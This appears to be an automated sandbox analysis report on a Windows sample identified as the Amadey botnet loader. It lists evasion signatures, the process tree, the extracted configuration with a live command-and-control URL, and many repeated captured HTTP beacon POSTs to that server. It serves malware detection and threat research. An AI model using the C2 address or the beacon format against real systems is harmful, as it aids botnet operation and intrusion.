Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1519874
MD5: b6041e0fe108db5e8addcf6d6b4da4bf
SHA1: 4f6d688e4294362965c5e74999cd6f4c24566956
SHA256: e5db33a91b7e4fd54196dad1042df50860dc815fdd1fb88a5e093ea2597cb196
Tags: exe, user-Bitsight
Infos:

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected Amadey's stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 1012 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B6041E0FE108DB5E8ADDCF6D6B4DA4BF)
    • axplong.exe (PID: 3392 cmdline: "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" MD5: B6041E0FE108DB5E8ADDCF6D6B4DA4BF)
  • axplong.exe (PID: 6704 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: B6041E0FE108DB5E8ADDCF6D6B4DA4BF)
  • axplong.exe (PID: 7648 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: B6041E0FE108DB5E8ADDCF6D6B4DA4BF)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Amadey | Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
{"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
Source | Rule | Description | Author | Strings
00000008.00000003.1978884229.0000000005090000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000002.00000003.1476249631.0000000005090000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000003.00000003.1475590462.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000000.00000003.1445064913.0000000004B90000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |

Source | Rule | Description | Author | Strings
2.2.axplong.exe.8a0000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
3.2.axplong.exe.8a0000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
0.2.file.exe.660000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
8.2.axplong.exe.8a0000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-27T01:43:10.768696+0200 | 2856147 | 1 | A Network Trojan was detected | 192.168.2.8 | 49716 | 185.215.113.16 | 80 | TCP

                    AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.16/Jo89Ku7d/index.php | Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/ | Avira URL Cloud: Label: phishing
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000008.00000003.1978884229.0000000005090000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | ReversingLabs: Detection: 52%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Joe Sandbox ML: detected
Source: file.exe | Joe Sandbox ML: detected
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

                    Networking

Source: Network traffic | Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.8:49716 -> 185.215.113.16:80
Source: Malware configuration extractor | IPs: 185.215.113.16
Source: global traffic
HTTP traffic detected:
POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s

Source: global traffic
HTTP traffic detected:
POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 156
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
